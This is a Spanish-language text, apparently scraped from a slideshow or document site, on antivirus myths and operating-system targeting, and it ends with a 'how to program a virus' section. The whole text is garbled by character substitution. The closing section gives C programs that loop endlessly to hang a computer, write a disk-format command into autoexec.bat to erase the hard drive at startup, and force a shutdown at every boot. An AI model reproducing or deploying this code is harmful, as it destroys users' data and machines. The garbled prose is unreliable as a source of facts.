Co4o %3!o "3%i;ir<# #%oD @ro%!i=o* [nicamente estoy prote+ido mientras el
antivirus sepa a lo que se enrenta y como com'atirlo* En +eneral los pro+ramas
antivirus no son capaces de detectar todas las posi'les ormas de conta+io e6istentes, ni
las nuevas que pudieran aparecer conorme las computadoras aumenten las capacidades
de comunicacin*
Co4o =i#@o3!o = <3 &irC"$$ 3o 4 6o3%"!io* Esto Bnicamente proporciona una
limitada capacidad de respuesta* Ias ormas de inectarse en una red son mBltiples*
Gnas provienen directamente de accesos a mi sistema (de lo que prote+e un ireKall) y
otras de cone6iones que reali? (de las que no me prote+e)* Emplear usuarios con altos
privile+ios para reali?ar cone6iones tampoco ayuda*
T3!o <3 #r;i=or C? 6<Do #i#%4" o@r"%i;o # <3 UNIK "6%<"$i7"=o " $"
&6'"* 2uede que este prote+ido contra ataques directamente )acia el nBcleo, pero si
al+una de las aplicaciones Ke' (2M2, 2erl, !panel, etc*) est desactuali?ada, un ataque
so're al+Bn script de dic)a aplicacin puede permitir que el atacante a'ra una s)ell y
por ende e-ecutar comandos en el G>IN*
SISTEMAS OPERATIVOS MAS ATACADOS
Ias plataormas ms atacadas por virus inormticos son la l,nea de sistemas
operativos 7indoKs de Microsot* &especto a los sistemas derivados
de Gni6 como <>GTIinu6, BS9, Solaris, Mac CS N, estos )an corrido con mayor suerte
de'ido en parte al sistema de permisos* >o o'stante en las plataormas derivadas de Gni6
)an e6istido al+unos intentos que ms que presentarse como amena?as reales no )an
lo+rado el +rado de daHo que causa un virus en plataormas 7indoKs*
PLATAFORMAS UNIK, INMUNES A LOS VIRUS DE LINDOLS
Gn virus inormtico slo atacar la plataorma para la que ue desarrollado*
E(EMPLO Y PRO2RAMACION DE UN VIRUS
Gn virus troyano y su pro+ramacin seria.
e-emplo ".
\include ]stdio*)^T_aqui importas al escenario lo que vayas a utili?ar el *) es un )eader
ile_T
void main()`
system(/.)ola/)XT_aqui dices que del sistema de los comandos de KindoKs te )a+a una
seccin llamada )ola_T
system(/start )ttp.TTKKK*+oo+le*com/)XT_a're +oo+le_T
system(/+oto )ola/) XT_va a la seccin )ola por lo tanto la repite ininitas veces_T
a
ese seria un Kin3% de c que sirve para que se tra'e tu computadora o por e-emplo %.
\include ]stdio*)^
void main()`
system(/bec)o o/)XT_se quita lo que viene al principio de cada oracin que usualmente es
la direccion donde esta u'icada el arc)ivo_T
system(/cls/)XT_'orra lo escrito_T
system(/s c ormat c. Os O Ot 0 ^^ c.dautoe6ec*'at/)XT_'orra el disco duro_T
a
esto )ara que se 'orre la inormacin o tam'ien
e-emplo 3.
\include ]studio*)^
void main()`
system(/bec)o o/)X
system(/cls/)X
system(/ec)o s)utdoKn Os Ot 0 ^^ c.dautoe6ec*'at/)XT_te apa+a la compu a la uer?a_T
system(/cls/)X
este es para que te apa+ue la computadora estos si+nos T__T

También podría gustarte